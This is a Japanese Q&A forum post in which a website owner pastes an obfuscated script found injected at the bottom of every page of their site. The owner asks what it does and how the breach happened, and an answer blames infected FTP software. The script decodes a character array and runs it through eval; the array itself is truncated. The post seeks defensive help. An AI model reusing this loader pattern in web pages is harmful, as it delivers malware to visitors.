1

私たちのサイトは、かなり人気のある .NET ホスティング プロバイダーでホストされています。したがって、それは安全であり、​​題は私たちの側にあると思います。私が間違っているかどうか教えてください。

Web サイトにウイルスが含まれているという苦情を Web サイトから受け取りました。というわけでホームページをチェック。

すべてのページで、ページの下部に次の追加のスクリプトがあることに気付きました!

<script>
try{document["b"+"o"+"d"+"y"]*=document}
catch(dgsgsdg){zxc=12;ww=window;}
try{d=document["createElement"]("span");}
catch(agdsg){zxc=0;}
try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}
catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}</script><script>try{window.document.body/=2}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"]
(parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}
</script></body>

私だけがパスワードを知っており、誰にも教えていないことを誓います。パスワードはランダムで、セキュリティ基準を満たしています。パスワードは年に 1 回程度変更しますが、それほど頻繁ではありませんが、問題ないと思います。

質問は次のとおりです。

  1. このスクリプトは何をしているのでしょうか。n=["9".....] 配列をリバースエンジニアリングするにはどうすればよいですか? 痕跡を見つけたい。

  2. ハッカーを侵入させた可能性のある方法は何ですか? この場合、ブルースが私たちのパスワードを強制して幸運になる以外に、彼はそれを行うことができたでしょうか?

4

1 に答える 1

1

「すべてのページの下部にあるスニペットは、通常、FTP プログラムが感染しており、削除または変更する必要があることを示しています。 – techfoobar」

100%確信はありませんが、techfoobar が正しいと思います。サイトのアップロードに使用していた FTP ソフトウェアが感染していたに違いありません。どうしてそうなったのかはわかりませんが、OS がクラッシュして機能しなくなりました。

于 2013-04-01T06:22:55.920 に答える